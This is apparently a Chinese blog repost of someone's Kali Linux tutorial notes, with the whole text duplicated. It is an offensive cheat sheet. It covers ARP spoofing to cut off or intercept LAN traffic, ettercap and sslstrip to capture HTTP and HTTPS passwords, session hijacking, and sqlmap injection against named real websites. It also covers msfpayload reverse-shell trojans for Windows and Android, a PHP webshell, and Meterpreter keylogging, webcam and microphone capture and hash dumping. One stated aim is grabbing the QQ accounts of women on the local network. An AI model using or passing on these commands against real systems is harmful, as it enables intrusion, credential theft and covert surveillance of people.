看kali教程的一些總結(i春秋上的kali吧教程)
阿新 • • 發佈:2019-01-07
windows 雨滴 美化
區域網 斷網攻擊 arp攻擊 arpspoof -i 網絡卡 -t 目標ip 閘道器
檢視區域網當中的ip Fping -asg 網段
獲取內網妹子的qq
arp欺騙 : 目標的IP流量經過我的網絡卡,從網關出去
arp斷網 :沒有從網關出去
進行IP流量轉發
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 寫命令,不會有回顯
可以ping通
此時:arp成功欺騙,不會出現斷網現象
場景回顧:
arp欺騙成功 ==
driftnet --> 獲取本機網絡卡的圖片
目標 --》 我的網絡卡 --》閘道器
看我的網絡卡的圖片資訊
Driftnet -i eth0
第八課 http賬號密碼獲取
開啟IP轉發
1、echo 1 > /proc/sys/net/ipv4/ip_forward
2、arpspoof 欺騙
3、ettercap -Tq -i eth0
-Tq 文字模式
第九課 https賬號密碼獲取
配置一下
同上
3、sslstrip -a -f - 》 https的連結還原為http
第十課 會話劫持
arpspoof
wireshark 抓包
ferret 重新生成抓包後的檔案
hamster 重放流量
sqlmap
asp http://www.czypjx.com/News_show.asp?id=113
asp www.wisefund.com.cn cookie 注入
php www.ggec.com.cn 注入
第十五課
msfpayload 生成木馬
use exploit windows/meterpreter/reverse_tcp
使用這個shellcode
第十六課
如何使用木馬:
help
木馬常用功能:
background 後臺執行
session -l 列出所有會話
session -i id 進入會話
注入程序 : 木馬隨時有可能被結束掉的
ps 得到我們要注入的PID程序
Migtrate xxx 注入
2036 2004 exlore.exe 桌面程序
migrate 2036
run vnc 開啟遠端桌面
檔案管理功能 :
download 下載檔案
edit 編輯檔案
cat 檢視檔案
mkdir 建立資料夾
mv 移動檔案
rm 刪除檔案
upload 上傳檔案
rmdir 刪除資料夾
網路及檔案操作
arp 看ARP緩衝表
ifconfig Ip地址
netstat 檢視埠連線
kill 結束程序
ps 檢視程序
reboot 重啟電腦
reg 修改登錄檔
shell 獲取shell
shutdown 關閉電腦
sysinfo 獲取電腦資訊
使用者操作和其它功能講解
enumdesktops --使用者登入數
keyscan_dump 鍵盤記錄下載--下載
keyscan_start -----開始
keyscan_stop -----停止
uncil disenable/enable keyboard
uncil disenable mounse?
獲取鍵盤滑鼠控制權
record_mic -h 音訊錄製
webcam_chat 檢視攝像頭介面
webcam_list 攝像頭列表
webcam_stream 攝像頭視訊獲取
getsystem 獲取高許可權
hashdump 獲取hash密文
第十八課 msf之安卓滲透
msfpayload android/meterpreter/reverse_tcp
使用這個shellcode
第十九課 msf 藍屏攻擊
DDOS
ms12_202 然並卵吧
第二十課 msf之生成webshell以及應用
1、在msf中生成一個php指令碼
msfpayload php/meterpreter/reverse_tcp LHOST=ip R > web.php
2、同上
execute
區域網 斷網攻擊 arp攻擊 arpspoof -i 網絡卡 -t 目標ip 閘道器
檢視區域網當中的ip Fping -asg 網段
獲取內網妹子的qq
arp欺騙 : 目標的IP流量經過我的網絡卡,從網關出去
arp斷網 :沒有從網關出去
進行IP流量轉發
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 寫命令,不會有回顯
可以ping通
此時:arp成功欺騙,不會出現斷網現象
場景回顧:
arp欺騙成功 ==
driftnet --> 獲取本機網絡卡的圖片
目標 --》 我的網絡卡 --》閘道器
看我的網絡卡的圖片資訊
Driftnet -i eth0
第八課 http賬號密碼獲取
開啟IP轉發
1、echo 1 > /proc/sys/net/ipv4/ip_forward
2、arpspoof 欺騙
3、ettercap -Tq -i eth0
-Tq 文字模式
第九課 https賬號密碼獲取
配置一下
同上
3、sslstrip -a -f - 》 https的連結還原為http
第十課 會話劫持
arpspoof
wireshark 抓包
ferret 重新生成抓包後的檔案
hamster 重放流量
sqlmap
asp http://www.czypjx.com/News_show.asp?id=113
asp www.wisefund.com.cn cookie 注入
php www.ggec.com.cn 注入
第十五課
msfpayload 生成木馬
use exploit windows/meterpreter/reverse_tcp
使用這個shellcode
第十六課
如何使用木馬:
help
木馬常用功能:
background 後臺執行
session -l 列出所有會話
session -i id 進入會話
注入程序 : 木馬隨時有可能被結束掉的
ps 得到我們要注入的PID程序
Migtrate xxx 注入
2036 2004 exlore.exe 桌面程序
migrate 2036
run vnc 開啟遠端桌面
檔案管理功能 :
download 下載檔案
edit 編輯檔案
cat 檢視檔案
mkdir 建立資料夾
mv 移動檔案
rm 刪除檔案
upload 上傳檔案
rmdir 刪除資料夾
網路及檔案操作
arp 看ARP緩衝表
ifconfig Ip地址
netstat 檢視埠連線
kill 結束程序
ps 檢視程序
reboot 重啟電腦
reg 修改登錄檔
shell 獲取shell
shutdown 關閉電腦
sysinfo 獲取電腦資訊
使用者操作和其它功能講解
enumdesktops --使用者登入數
keyscan_dump 鍵盤記錄下載--下載
keyscan_start -----開始
keyscan_stop -----停止
uncil disenable/enable keyboard
uncil disenable mounse?
獲取鍵盤滑鼠控制權
record_mic -h 音訊錄製
webcam_chat 檢視攝像頭介面
webcam_list 攝像頭列表
webcam_stream 攝像頭視訊獲取
getsystem 獲取高許可權
hashdump 獲取hash密文
第十八課 msf之安卓滲透
msfpayload android/meterpreter/reverse_tcp
使用這個shellcode
第十九課 msf 藍屏攻擊
DDOS
ms12_202 然並卵吧
第二十課 msf之生成webshell以及應用
1、在msf中生成一個php指令碼
msfpayload php/meterpreter/reverse_tcp LHOST=ip R > web.php
2、同上
execute